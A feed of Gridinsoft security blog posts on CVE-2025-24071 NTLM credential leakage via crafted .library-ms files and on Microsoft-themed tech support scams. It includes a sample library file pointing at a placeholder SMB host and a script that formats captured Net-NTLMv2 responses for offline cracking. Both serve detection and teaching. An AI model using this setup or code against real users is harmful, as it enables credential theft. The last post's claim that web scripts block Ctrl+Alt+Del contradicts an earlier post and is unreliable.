Microsoft – Gridinsoft Blog
https://gridinsoft.com/blogs
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe.
Wed, 09 Jul 2025 01:20:33 +0000

CVE-2025-24071 Windows File Explorer Spoofing Vulnerability Uncovered, Patch Now
https://gridinsoft.com/blogs/windows-vulnerability-cve-2025-24071/
Thu, 20 Mar 2025 11:18:02 +0000

The post CVE-2025-24071 Windows File Explorer Spoofing Vulnerability Uncovered, Patch Now appeared first on Gridinsoft Blog.

Microsoft has disclosed CVE-2025-24071, a vulnerability in Windows File Explorer with a CVSS score of 7.5 (high severity). It lets attackers capture a user's NTLM credentials (the Net-NTLMv2 challenge/response, often loosely called the "NTLMv2 hash"), which can then be cracked offline or relayed in further attacks. The vulnerability has been fixed by Microsoft.

CVE-2025-24071 Windows File Explorer Spoofing Vulnerability Overview

Microsoft published an advisory for CVE-2025-24071 with its March 2025 security updates. Although Microsoft classifies the issue as a spoofing vulnerability, its practical impact is disclosure of NTLM credentials; its CVSS score is 7.5, which is high severity rather than critical. It affects multiple versions of Windows, including Windows 10, Windows 11, and various Windows Server releases. The vulnerability arises from Windows Explorer's implicit trust in and automatic parsing of .library-ms files, XML documents that define the search or library locations a Windows Library aggregates.

[Screenshot: CVE-2025-24071 details]

The core issue is that when a .library-ms file crafted with a malicious SMB (Server Message Block) path is embedded in a RAR or ZIP archive and then extracted, Windows Explorer processes it automatically: as soon as the file lands in a folder Explorer is displaying, Explorer and the search indexer parse it to render its icon and preview and to index its locations. The user never has to open the file.

This processing makes the machine connect to the attacker-controlled SMB server and authenticate with NTLM, disclosing the user's Net-NTLMv2 challenge/response. That value is not a password hash that can be replayed in a pass-the-hash attack; what it does allow is offline cracking, which recovers the password if it is weak, or NTLM relay, where the attacker forwards the authentication to another service that accepts NTLM without requiring signing. Either outcome is a significant security risk.

Technical Details

The PoC for CVE-2025-24071 has been released for educational purposes only and is publicly available on GitHub in the eponymous repository, created by a malware and CTI analyst known as 0x6rss. The PoC is a Python script that demonstrates the exploitation process. It creates a specially crafted .library-ms file whose location element (simpleLocation/url in the Windows Library Description schema) points to an attacker-controlled SMB server (e.g., \\192.168.1.116\shared). This file is then compressed into a RAR or ZIP archive.

[Screenshot: Contents of the .library-ms file used to reproduce the CVE-2025-24071 vulnerability (source: 0x6rss)]

Upon extraction of the archive, Windows Explorer automatically starts processing the .library-ms file. This can be observed with Process Monitor (Procmon), where Explorer.exe and SearchProtocolHost.exe perform CreateFile, ReadFile, QueryBasicInformationFile and CloseFile operations on the file for indexing purposes.
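The extraction-and-indexing chain described above is also what a defender can check for before an archive ever reaches a user's desktop. The following Python script is an added example written for this post; it is not the 0x6rss PoC or Gridinsoft code. It walks a ZIP archive, parses every .library-ms member using the Windows Library Description schema namespace, and reports any url location that resolves to a remote host (a UNC path or a file:// URL). The archive it scans is constructed inline, and the host 192.0.2.10 and the member names are placeholders, not indicators from the article. RAR input would need a third-party reader such as the rarfile package, which is left out to keep the example dependency-free.

```python
"""Scan ZIP archives for .library-ms entries pointing at remote (UNC) locations.

Added example for this post, not the 0x6rss PoC. The sample archive built below is
constructed inline so the script runs offline; the host 192.0.2.10, the share name
and the member names are placeholders (hypothetical), not indicators from the article.
"""
import io
import re
import zipfile
import xml.etree.ElementTree as ET
from typing import List, Optional, Tuple

# Namespace of the Windows Library Description schema used by .library-ms files.
LIB_NS = "http://schemas.microsoft.com/windows/2009/library"

# A UNC path (\\host\share), its forward-slash form, or a file:// URL, anchored at the start.
UNC_RE = re.compile(r"^(?:\\\\|//|file://)(?P<host>[^\\/]+)", re.IGNORECASE)


def library_locations(xml_bytes: bytes) -> List[str]:
    """Return every <url> value in a .library-ms document, with or without the namespace."""
    root = ET.fromstring(xml_bytes)
    return [
        (el.text or "").strip()
        for el in root.iter()
        if el.tag.rsplit("}", 1)[-1] == "url"
    ]


def is_remote(url: str) -> Optional[str]:
    """Return the remote host if the location resolves off the local machine, else None."""
    m = UNC_RE.match(url)
    return m.group("host") if m else None


def scan_zip(data: bytes) -> List[Tuple[str, str, str]]:
    """Return (member name, location, remote host) for every remote library location found."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".library-ms"):
                continue
            try:
                locations = library_locations(zf.read(info))
            except ET.ParseError:
                # Malformed XML in a file Explorer will parse unprompted is itself worth a flag.
                findings.append((info.filename, "<unparseable XML>", ""))
                continue
            for loc in locations:
                host = is_remote(loc)
                if host:
                    findings.append((info.filename, loc, host))
    return findings


# Constructed sample: one remote (UNC) location and one harmless local path.
SAMPLE_LIBRARY_MS = b"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>\\\\192.0.2.10\\shared</url>
      </simpleLocation>
    </searchConnectorDescription>
    <searchConnectorDescription>
      <simpleLocation>
        <url>C:\\Users\\Public\\Documents</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
"""


def build_sample_zip() -> bytes:
    """Construct an archive containing the sample library file (test data, not a real lure)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("invoice.library-ms", SAMPLE_LIBRARY_MS)
        zf.writestr("readme.txt", b"nothing to see here")
    return buf.getvalue()


if __name__ == "__main__":
    for member, location, host in scan_zip(build_sample_zip()):
        print(f"{member}: {location} -> remote host {host}")
```

The scan keys on the location value rather than on the file extension alone, because Windows Libraries legitimately contain .library-ms files with local or known-folder entries; only a location that would make the indexer reach out over the network is reported.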

That processing triggers an SMB authentication handshake, which can be captured in Wireshark with the display filter smb || smb2: an SMB2 Negotiate Protocol Request from the victim to the attacker's server, followed by an SMB2 Session Setup Request carrying NTLMSSP_AUTH, which leaks the victim's Net-NTLMv2 response. The defining feature of this vulnerability is that no user interaction is required beyond extracting the archive; the victim never opens the file, which makes it effectively zero-click in any workflow where archives are routinely extracted.
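To see exactly what leaks in that Session Setup exchange, and why it is a challenge/response rather than a reusable hash, here is an added Python example (not code from the article or from the PoC) that parses the NTLM CHALLENGE (type 2) and AUTHENTICATE (type 3) messages carried in the two SMB2 Session Setup messages and prints the Net-NTLMv2 material in the layout offline crackers such as hashcat expect (mode 5600). It assumes the NTLM Unicode flag was negotiated, which is the case on every modern Windows client. Both messages are constructed inline with placeholder values (user alice, domain CORP, a fixed server challenge and an NTProofStr of sequential bytes), so the output is structurally valid but would never crack.

```python
"""Extract the Net-NTLMv2 challenge/response from an NTLM type 2 / type 3 message pair.

Added example for this post; not code from the article or the PoC. The messages below
are constructed with placeholder values so the script runs without a packet capture;
the NTProofStr is not a real HMAC-MD5, so the resulting line is for illustration only.
"""
import struct

NTLMSSP = b"NTLMSSP\x00"


def _field(msg: bytes, off: int) -> bytes:
    """Read an NTLM (Len, MaxLen, Offset) descriptor at `off` and return the payload it points to."""
    length, _maxlen, offset = struct.unpack_from("<HHI", msg, off)
    return msg[offset:offset + length]


def server_challenge(type2: bytes) -> bytes:
    """The 8-byte ServerChallenge sits at a fixed offset in CHALLENGE_MESSAGE."""
    if type2[:8] != NTLMSSP or struct.unpack_from("<I", type2, 8)[0] != 2:
        raise ValueError("not an NTLM CHALLENGE_MESSAGE")
    return type2[24:32]


def net_ntlmv2_line(type2: bytes, type3: bytes) -> str:
    """Return USER::DOMAIN:serverchallenge:NTProofStr:blob (hashcat mode 5600 layout)."""
    if type3[:8] != NTLMSSP or struct.unpack_from("<I", type3, 8)[0] != 3:
        raise ValueError("not an NTLM AUTHENTICATE_MESSAGE")
    # Descriptors follow the 12-byte header in fixed order: Lm(12) Nt(20) Domain(28) User(36) ...
    nt_resp = _field(type3, 20)
    domain = _field(type3, 28).decode("utf-16-le")   # assumes NTLMSSP_NEGOTIATE_UNICODE
    user = _field(type3, 36).decode("utf-16-le")
    if len(nt_resp) <= 24:
        raise ValueError("24-byte response is NTLMv1, not an NTLMv2 blob")
    nt_proof, blob = nt_resp[:16], nt_resp[16:]
    return f"{user}::{domain}:{server_challenge(type2).hex()}:{nt_proof.hex()}:{blob.hex()}"


def build_type2(challenge: bytes) -> bytes:
    """Minimal CHALLENGE_MESSAGE: empty TargetName/TargetInfo, Unicode flag, challenge, Version."""
    header = NTLMSSP + struct.pack("<I", 2)
    target_name = struct.pack("<HHI", 0, 0, 56)
    flags = struct.pack("<I", 0x00000001)          # NTLMSSP_NEGOTIATE_UNICODE
    reserved = b"\x00" * 8
    target_info = struct.pack("<HHI", 0, 0, 56)
    version = b"\x00" * 8
    return header + target_name + flags + challenge + reserved + target_info + version


def build_type3(user: str, domain: str, nt_resp: bytes) -> bytes:
    """AUTHENTICATE_MESSAGE without Version/MIC; payload starts right after NegotiateFlags (64)."""
    payload_start, payload, fields = 64, b"", b""
    for item in (b"", nt_resp, domain.encode("utf-16-le"), user.encode("utf-16-le"), b"", b""):
        fields += struct.pack("<HHI", len(item), len(item), payload_start + len(payload))
        payload += item
    return NTLMSSP + struct.pack("<I", 3) + fields + struct.pack("<I", 0x00000001) + payload


# Constructed sample values (placeholders, not from a real capture).
SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
SAMPLE_NT_PROOF = bytes(range(16))                    # stands in for HMAC-MD5(NTLMv2 key, ...)
SAMPLE_BLOB = bytes.fromhex(
    "0101000000000000"                 # RespType, HiRespType, Reserved1, Reserved2
    "0000000000000000"                 # Timestamp (zeroed placeholder)
    "aabbccddeeff0011"                 # ChallengeFromClient
    "00000000"                         # Reserved3
    "0200" "0800" "43004f0052005000"   # AvPair MsvAvNbDomainName = "CORP" (UTF-16LE)
    "0000" "0000"                      # MsvAvEOL
    "00000000"                         # Reserved4
)
SAMPLE_TYPE2 = build_type2(SAMPLE_CHALLENGE)
SAMPLE_TYPE3 = build_type3("alice", "CORP", SAMPLE_NT_PROOF + SAMPLE_BLOB)

if __name__ == "__main__":
    print(net_ntlmv2_line(SAMPLE_TYPE2, SAMPLE_TYPE3))
```

The output shows why "NTLMv2 hash" is a misnomer: the NTProofStr is an HMAC over the server challenge and the client blob, tied to this one session, so it cannot be presented to another server as a credential. What an attacker gets is a target for offline guessing, or a live session to relay; both are stopped by the mitigations named in the next section and by strong, unique passwords.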

Exploitation in the Wild and Microsoft Response

Research suggests that CVE-2025-24071 is not only theoretical but has been exploited in the wild. In the PoC repository's write-up, the author reports that the vulnerability may have been sold on a forum by a threat actor named "Krypt0n," known for developing EncryptHub Stealer. An X post further corroborates this, describing how the exploit is set up on a server (e.g., a VPS) with the attacker's IP and share name, so that hashes leak as soon as Explorer touches the file, without it being opened.

Microsoft addressed this vulnerability in the March 2025 Patch Tuesday update, released earlier this month; the details are in the Microsoft Security Update Guide. Users of affected systems should install the update. Where patching is delayed, the usual compensating controls for NTLM leak bugs apply: block outbound SMB (TCP port 445) to the internet at the perimeter and on the host firewall, and consider the "Network security: Restrict NTLM: Outgoing NTLM traffic to remote servers" policy, since both stop a workstation from handing its credentials to an arbitrary external host.

Microsoft Account Locked
https://gridinsoft.com/blogs/microsoft-account-locked-scam/
Wed, 12 Mar 2025 08:15:46 +0000

The "Microsoft Account Locked" scam is a deceptive tech support fraud. Users receive pop-up messages falsely claiming their Microsoft account is locked due to suspicious or illegal activities, such as money laundering. These pop-ups, which are not affiliated with Microsoft, urge users to call a toll-free number that connects them to scammers posing as Microsoft technicians. In this post I analyze the scam in more detail and give some recommendations on how to avoid falling victim to it.

“Microsoft Account Locked” scam Overview

The "Microsoft Account Locked" scam is classified as a tech support scam, a form of phishing and social engineering fraud. It targets users by displaying messages falsely claiming their Microsoft account has been locked over detected illegal activity, such as money laundering. To be clear, this scam has nothing to do with Microsoft. Its purpose is to trick victims into contacting the scammers, which leads to financial losses, identity theft, and unwanted software on the system.

[Screenshot: "Microsoft Account Locked" fake page]

The scam poses a medium damage level, with impacts including loss of sensitive private information, monetary loss, and possible malware infections. The scam’s distribution methods include compromised websites, rogue online pop-up ads, and potentially unwanted applications. Recent data, as of March 2025, indicates its continued relevance, with variations observed in messaging and delivery.

How the Scam Operates

The scam operates in several carefully planned stages that exploit user trust rather than any software flaw. It starts with a pop-up message appearing on the victim's screen, usually triggered by visiting a compromised website or clicking a rogue ad.

[Screenshot: the page redirects the user to an alert that the Microsoft account is locked]

The message might claim, "Your Microsoft account has been locked due to detected illegal activity," and originate from domains like mshelp.netlify[.]app. The associated IP address (34.234.106.80) currently has no detections on VirusTotal, which is not surprising: netlify.app is Netlify's shared static hosting, so that IP serves many unrelated sites and its reputation says little about this one. The hostname is the indicator worth blocking. These pop-ups are crafted to resemble legitimate Microsoft alerts, using branding and urgent language to create a sense of panic.

[Screenshot: "Microsoft Account Locked" running full screen and playing scary sounds]

When users attempt to “unlock” their accounts, they are redirected to another pop-up instructing them to call a supposed “Emergency Assistance” number, such as 18333982352. This number is not affiliated with Microsoft and serves as a key indicator of the scam. If the user calls, scammers posing as Microsoft-certified technicians use social engineering tactics to build trust. They claim they need personal details or remote access to “fix” the issue, leveraging fear and urgency to manipulate the victim.

Once granted remote access – often via legitimate tools like TeamViewer or UltraViewer – scammers can engage in a range of malicious activities. They may steal login credentials, personal information, and financial data. They might install malware, including trojans, ransomware, or cryptominers, further compromising the system.

In some cases, they run fake antivirus scans that report non-existent threats, pressuring users into purchasing fraudulent software. Financial exploitation is also common. Scammers demand payments via hard-to-trace methods like gift cards, cash, or cryptocurrency, leading to direct monetary loss.

The scam spreads through multiple channels to maximize its reach. One method involves compromised websites that have been hacked to display malicious pop-ups. Another common tactic is rogue online pop-up ads, which are served through malvertising networks and can appear even on legitimate websites. Additionally, the scam can be delivered via potentially unwanted applications (PUAs), which may install adware that triggers fraudulent pop-ups.

There are multiple variants of this scam, each using slightly different messaging. One version, for example, warns "YOUR COMPUTER HAS BEEN BLOCKED"; we explain how that variant works on the technical side in a dedicated post.

Red Flags and Detection

The first and most important red flag is that these notifications appear inside the web browser. Let me make one thing clear: a website technically does not have the ability to scan your device for viruses or system errors. The only exception is an official vendor site with a feature to install or update drivers, and that works only if the vendor's own utility is installed on the system; in that case the website is effectively part of the utility's interface. In all other cases, if a third-party site shows a notification that errors have been detected in your system, it is a guaranteed scam.

So, let's summarize the key red flags. The first is an unsolicited pop-up claiming account or system issues, especially one that appears without any action on your part. Another warning sign is a phone number in the pop-up: legitimate companies like Microsoft do not display support numbers this way; their official contacts are only available on their official website.

Scammers also use high-pressure tactics, urging victims to call immediately or warning that their account will be permanently locked. Messages often contain grammatical errors or awkward phrasing, a common trait of scam communications. Additionally, scammers frequently request remote access via software like TeamViewer, which, while legitimate, is exploited in these schemes.

How To Stay Safe?

To protect against this scam, users should take several key precautions. Always verify the authenticity of messages or pop-ups by checking Microsoft's official support page or contacting support through verified channels such as the official website or app. Never call a phone number provided in a pop-up; instead, look up Microsoft's official contact information independently. Reverse phone lookup and anti-spam services can also tell you whether the number shown has already been reported.

[Screenshot: anti-spam services identify this number as potentially dangerous]

Avoid granting remote access to your computer unless you initiated the contact through a verified channel and are certain it is legitimate. Keeping your operating system and software updated helps protect against vulnerabilities that scammers exploit through compromised websites. And remember: Microsoft does not contact you unsolicited, and no legitimate support will ask for remote access in response to a pop-up you never requested.

Windows Defender Security Center Scam
https://gridinsoft.com/blogs/windows-defender-security-center-scam/
Sat, 01 Feb 2025 09:39:19 +0000

“Windows Defender Security Center” is a scam message that comes from a fake website. This fraud is built on the inexperience and trust of Internet users. Now I will tell you how it works and how not to become a victim of it.

Windows Defender Security Center Scam Overview

"Windows Defender Security Center" is a fake malware alert that appears on various scam websites. Users often land on these pages unintentionally while browsing other websites. In certain cases a browser hijacker is responsible: the main job of such unwanted software is to lead users to sketchy pages, and scam sites are just one more destination.

[Screenshot: example of the "Windows Defender Security Center" scam]

The scheme is simple: the fake alert warns the victim that their system is infected with multiple viruses and urges them to call the number provided, which typically connects the victim to a call center, usually in another country.

There, scammers insist that the computer is severely compromised and offer a "solution": they ask the victim to install an app that will supposedly resolve the problem. Instead of a solution, the user gets a potentially unwanted application (PUA). Once installed, this software runs a fake scan, detects non-existent threats, and demands payment for an "activation" that does nothing.

How Does the Windows Defender Security Center Scam Operate?

The first part of the scam takes place on a website that pretends to be a Microsoft malware alert of some kind. It is quite easy to get one opened in a background tab while browsing sketchy websites with pirated movies or games. The title of the website, Windows Defender Security Center, is what gave the scam campaign its name.

When an unsuspecting user clicks anything on that website, it extends into a fullscreen mode, and starts playing a scary AI-generated voice message. It states something along the lines of “your computer is infected and we locked it to stop the malware, contact our support immediately”. The exact text may change from one scam site to another, but the overall story is always the same.

One trick these sites pull is interfering with the usual way out of full-screen mode: F11 or a short tap of Esc appears to do nothing. A web page cannot actually override the browser's Esc handling; what it does is call the browser's Keyboard Lock API, which makes Chromium-based browsers require that Esc be pressed and held for a couple of seconds to leave full screen (the browser shows a "press and hold Esc" prompt). Holding Esc, or closing the browser with Alt+F4, gets you out of the scam without any call to "tech support".

Crooks posing as “Microsoft-certified technicians” instruct victims to grant remote access, pretending to diagnose issues. In reality, they plant additional junkware, modify system settings, and pressure users into paying for unnecessary services.

[Screenshot: example of a program installed by the Windows Defender Security Center scam "technicians"]

These programs frequently display fake security warnings, convincing users that urgent action is necessary. After running a sham system scan, the software presents a long list of supposed infections. However, the “free” version conveniently cannot remove them. Apps push the victims to purchase the full version, which merely clears the list — without providing any real protection or optimization.

[Screenshot: the program asks to buy the full version to resolve the "problems"]

To make matters worse, scam websites often employ browser-locking scripts, preventing users from closing the page. PUPs also are notorious for injecting aggressive advertisements – pop-ups, banners, and in-text ads – disrupting the browsing experience and sometimes covering legitimate website content. These ads can lead to malware-laden pages or execute drive-by downloads, silently installing additional threats. Even a single misclick can result in severe infections.

Another critical concern is data tracking. Many PUPs harvest user information, including IP addresses, search history and visited websites; keystroke logging, when present, is properly the behaviour of a different threat type, spyware. In any case, this data is sold to third parties, potentially leading to privacy breaches, targeted phishing attacks, or even identity theft. Some PUPs go further by mining cryptocurrency or running background processes, significantly degrading system performance.

How Do PUPs Infiltrate the System?

Many PUPs get into the computer without explicit user consent, often bundled with freeware or delivered via misleading ads. While some PUPs have official websites, most spread through deceptive methods. Developers rely on “bundling” — hiding unwanted programs inside installation packages of legitimate software.

Since many users rush through installations without reviewing options, they unknowingly allow PUPs onto their systems. These unwanted programs are often concealed within “Custom” or “Advanced” installation settings, which many users overlook. Intrusive ads also play a role, redirecting users to sites offering fake downloads or deceptive prompts, leading to unintentional PUP installations.

How to Prevent PUP Infections?

To minimize the risk of PUP infections, users must adopt cautious browsing habits. This is especially important when visiting streaming, gambling, or adult content websites. Downloading software should be done exclusively from official sources, as third-party downloaders often distribute bundled PUPs. When installing software, reviewing the “Custom” or “Advanced” settings is crucial to opting out of any hidden programs. If a browser starts redirecting unexpectedly, users should inspect and remove suspicious extensions or applications that may have been installed without their knowledge.

As I said above, scammers rely on social engineering to manipulate users into falling for their schemes. Fraudulent pop-ups often feature spelling mistakes and poor design, making them appear unprofessional. They also employ urgency tactics, such as countdown timers, to pressure users into taking immediate action.

Claims that users have won a prize, despite never entering a contest, are another red flag. Additionally, pop-ups that appear to scan a device for viruses are always fraudulent, as webpages cannot perform such actions. Finally, any pop-up offering an exclusive financial opportunity only for the user is a clear scam attempt.

While most pop-ups do not directly install malware, they can still lead to financial loss or identity theft. Sometimes they prevent the browser from being closed. If this happens, terminate the browser from Task Manager or restart the system with the physical power button. When you reopen the browser, do not restore the previous session, or the malicious page will load again.

Azurestaticapps.net
https://gridinsoft.com/blogs/azurestaticapps-net-scam/
Mon, 07 Oct 2024 15:30:45 +0000

Azurestaticapps.net is a selection of pages registered on genuine Microsoft hosting, that try scaring the user by false malware infection claims. In fact, it is nothing but intimidation that ends up with a call to fake tech support, that eventually steals personal information or installs unwanted software. In this post, I will debunk all the elements of that fraudulent site, and explain how to avoid them in future.

Azurestaticapps.net Scam Website Overview

As I mentioned in the introduction, Azurestaticapps.net is not a single page but a whole network of scam sites operated by the same group of fraudulent actors. They use genuine Microsoft Azure hosting both as a disguise and as a convenient way to run the operation. All of the sites are designed to make users believe their system is infected with viruses, that Microsoft has therefore locked the computer, and that they must call a hotline. Here is how it typically looks:

[Screenshot: typical appearance of an Azurestaticapps.net scam site]

To make the victim believe everything is real, scammers not only copy the visual style of Microsoft sites but also play a scary robotic voice message that repeats the content of the banner. Once you click anywhere on the site, it switches to full-screen mode and blocks the usual ways out, including a short tap of the Esc key. Holding Esc for a couple of seconds, Alt+F4, or closing the browser from Task Manager still work; the point of the trick is to create the feeling that there is no way out, pushing the victim to follow the instructions in the banner.

Not sure whether you can trust the site? Consider scanning it on our free online website checker! It goes through the entire website, checking its contents’ safety by a selection of parameters. Just 15 seconds – and you will know exactly whether the website is trustworthy.

And these instructions are what leads the user to the main part of the scam – a call to a pseudo tech support. The specified number differs from one site to another, but they are essentially the same: a US number that redirects the call to a scam call center somewhere in India or another Asian country. There is a whole infrastructure built around these fake support scams, that was at one point disrupted by the FBI, but fraudulent activity is back up again.

Azurestaticapps.net Fake Tech Support Contact

The people who pretend to be Microsoft tech support agents work with one single purpose: to get the user to install questionable software. They either instruct the caller to install a "fix tool" themselves or ask for remote access to the system so they can do it. As a result, the user ends up with a non-existent problem "solved" and a dodgy program running on their system.

The key danger of all this is, in fact, not only forcing users into this call by fake alerts, but this program that gets installed in the end. They range from fake antiviruses to “system tweakers” that can cripple system stability and performance, and quite often dare to ask to buy a license to keep using them. Fake support and the Azurestaticapps.net sites are, in fact, the main ways for such applications to propagate to user systems.

How did I get to the Azurestaticapps.net?

As you may already guess, you won’t typically get to sites like Azurestaticapps.net in a normal way, i.e. through search results or regular links on other sites. Instead, they rely on spontaneous redirects from shady websites, particularly ones that have illegal content of some sort. Cracked games and programs, pirated movies, cheats or some strange game mods – offerings like this are quite often synonymous with a fishy site with redirects or outright malware.

In certain cases, fake virus alarm pages are getting opened because of adware activity. Typical signs of this situation include repeated appearance of this or similar scams in absence of any user interaction. In simple words, if strange things happen with your browser or system, while you are not doing anything, that may be the sign of malware presence.

Scan your system for malware

The best way to clear things up is to use a dedicated security software. GridinSoft Anti-Malware will check the entire system and delete all the detected malicious programs. A Full Scan will be the best option for that case: this way, the program will check even the most remote folders, down to system configuration files.

[Screenshot: GridinSoft Anti-Malware main screen]

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

[Screenshot: scan results screen]

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

[Screenshot: removal finished]

Top 3 Vulnerabilities of 2024: How to Block and Prevent
https://gridinsoft.com/blogs/top-3-vulnerabilities-block-prevent/
Sun, 15 Sep 2024 18:14:59 +0000

Any successful remote cyberattack starts with penetration of the target network. Regardless of the type of threat (spyware, ransomware, or infostealer), first it must be delivered before it can be deployed. Attackers use a variety of methods and tools to accomplish this. Some of them require some action on the part of the individual. Others, in turn, rely on vulnerabilities in the system and can be delivered and deployed without the victim’s involvement.

Top Vulnerabilities in 2024

From quite a few vulnerabilities that surfaced in 8 months of 2024, there are several that created significant fuss in the cybersecurity community. Key sign of the significance is, of course, the number of systems that may be impacted. Though, I won’t ignore other factors, like ease of exploitation and severity of possible consequences.

[Image: How do vulnerabilities work?]

There may also be confusion over whether a flaw counts as "top" depending on how often it is exploited. Some flaws keep circulating for years after their discovery, so rankings often include those older vulnerabilities; in certain years these overdue weaknesses dominated despite everything discovered that year. In this article I concentrate exclusively on flaws discovered in 2024, with the other characteristics mentioned above in mind.

Critical RCE Threat in Windows TCP/IP Stack

CVE-2024-38063 is a critical vulnerability in Windows 10/11 that allows remote code execution (RCE) via IPv6 packets. The vulnerability is rated CVSS 9.8 and affects Windows 10, Windows 11 and Windows Server 2008-2022. Security researcher Marcus Hutchins has published a detailed analysis of the vulnerability. He also noted that this vulnerability affects one of the most exposed parts of the Windows kernel, the tcpip.sys driver, which is responsible for processing TCP/IP packets. In other words, attackers can exploit this vulnerability by sending specially crafted IPv6 packets to the target machine, allowing RCE without user interaction.

As for the potential risks: a successful attack gives the attacker SYSTEM-level code execution on the vulnerable machine, which means full access to its data and, in practice, a classic way to deploy malware in attacks of any scale. Microsoft has released the update and strongly recommends applying it as soon as possible. For systems that cannot be patched immediately, Redmond recommends disabling IPv6 to reduce the attack surface; treat this as a temporary measure, since Microsoft does not recommend running Windows with IPv6 disabled in general.

Fortunately, there were no exploitation cases known to the moment. But the fact that the vulnerability exposes individual users and corporations alike makes it worth keeping in mind and fixing when the opportunity arises.

Critical Remote Code Execution in Microsoft Project

CVE-2024-38189 is a critical remote code execution vulnerability in Microsoft Project, which ships as part of several Office editions, including Microsoft 365 Apps (Office 365). Its CVSS score of 8.8 reflects how much damage attackers can do with it. Unlike the previous flaw, exploiting CVE-2024-38189 requires user interaction: the attacker must convince the victim to open a malicious Microsoft Project file, and the attack only succeeds where the "Block macros from running in Office files from the Internet" policy is disabled and VBA macro notification settings are not enabled. In the era of LLM-generated phishing emails, the social-engineering part is no obstacle for attackers.

Successful exploitation gives the attacker code execution in the context of the user who opened the file, which can lead to data theft and, chained with other flaws, full control over the system. Microsoft has released an update, so the only tasks for users are to apply it and to watch for suspicious network activity. With the vulnerability being actively exploited in the wild, this update should not be delayed.

RCE Flaw in the Windows Scripting Engine (Edge IE Mode)

The third vulnerability is CVE-2024-38178, a memory corruption flaw in the Windows scripting engine used by Microsoft Edge in Internet Explorer mode, with a CVSS score of 7.5. It allows remote code execution under specific conditions: as with the previous flaw, an authenticated client has to be tricked into clicking a malicious link, and the victim must be using Edge in Internet Explorer mode. That narrows the population of targets but not the impact; South Korea's National Cyber Security Center reported that the vulnerability was used in a state-sponsored APT attack.

The vulnerability arises from a flaw in how the scripting engine processes web content: a crafted page can execute code on the victim's machine with the browser user's privileges, which in turn opens the way to data theft and further compromise. The attacker needs no prior access to the target, only a user who clicks. To stay safe, install the update and, if Internet Explorer mode is not needed, disable it in Microsoft Edge.

What Causes the Vulnerabilities to Appear?

Typical reasons for vulnerabilities are poor software engineering, aging technology, misuse of software, or all of these together. It is hard to trace the cause of each specific vulnerability given their sheer number, but it is obvious that the more complex a program is, the easier it is for something inside it to break, or to be broken on purpose.

[Screenshot: Windows Update; make sure your system is up to date]

The worst part about it is that you can’t really do anything to prevent the vulnerabilities from appearing (unless you are the developer, of course). For users, and even corporations, the only way to protect themselves against the consequences of vulnerability exploitation is to install all the recent updates. And even this is no guarantee against zero-day flaws.

How to prevent vulnerabilities?

To summarize, let me make a few recommendations to help reduce the likelihood of successful exploitation of vulnerabilities:

  • Install the latest updates. Responsible software developers release flaw fixes as part of their regular updates, and I strongly recommend not ignoring them. If you use an end-of-service program, it is better to update to the newest version or seek an alternative that still receives software updates. “Unsupported” does not mean “free of vulnerabilities”!
  • Use software from reliable developers. While vulnerabilities can appear in any software, from any developer, the likelihood of this happening is much higher when you rely on software from a no-name dev team. Large and renowned developers, aside from doing thorough testing, will also provide all the needed support and updates for their software.
  • Keep an eye on security news. Companies sometimes struggle with notifying their users in a timely manner. By following newsletters, you stay up to date about the recent flaws or attacks.

Ads(exe).finacetrack(2).dll Virus Explained (https://gridinsoft.com/blogs/ads-exe-finacetrack2-dll/, Tue, 10 Sep 2024)

Ads(exe).finacetrack(2).dll is a detection name that you can see on websites pretending to be malware infection alerts from Microsoft. Such pages appear all of a sudden, blocking user input and displaying a scary message, accompanied by a robotic voice message in the background. The site eventually asks the user to call “tech support” to solve the alleged malware problem.

    Such sites are a part of a huge network of “fake tech support” web pages. They pretend to be official Microsoft sites, notifying people about “severe malware infections” present in the system. In fact, all that is happening is one big fiction. In this article, I explain how these sites operate, why they open in your browser, and how to stop that for good.

    What is Ads(exe).finacetrack(2).dll?

Ads(exe).finacetrack(2).dll is a detection name for an alleged malicious program running in the system. It appears on a fake Microsoft website, or at least one that its authors tried to make look like a Microsoft site. The top layer is a banner that says the system is blocked for security reasons. That same banner also contains the phone number of a “tech support” that one should supposedly call to fix the issue.

    Ads(exe).finacetrack(2).dll scam
    Typical appearance of the Ads(exe).finacetrack(2).dll scam page

    The website itself is designed in a rather specific way. Once the user who gets to this site clicks on any of its elements, it will scale to full screen, and start playing a scary voice message:

Voice message transcription:

Important security message.
Your computer has been locked up. Your IP address was used without your knowledge or consent to visit websites that contain identity theft virus.
To unlock the computer, please call support immediately.
Please do not attempt to shut down or restart your computer. Doing that may lead to data loss and identity theft. The computer lock is aimed to stop illegal activity. Please call our support immediately.

Following that switch, the usual keyboard combinations stop working (yes, even Alt+F4 and Ctrl+Alt+Del). The reason for this is the site’s own scripts, which intercept these combinations before the system can handle them. As a result, the user feels trapped, with no way out other than following the guidance from the banner.

Still, there is a simple trick to get out of such a scam site. If you press the Esc key several times, your browser will show you a pop-up window saying to hold down Esc to exit full screen mode. That is different from a single press of the key, and is probably yet another trick from the website. And that is it – hold it down, and then just close the window with the malicious website as you usually do.

    How does this scam work?

Fake tech support scams, including the Ads(exe).finacetrack(2).dll one, operate in several steps. They need to get the user to a scam page, make them follow the instructions, and force them to allow the “support” to do its “job”. The latter typically results in the installation of unwanted programs, often so-called scareware. Let’s go through each of these steps.

    Beginning

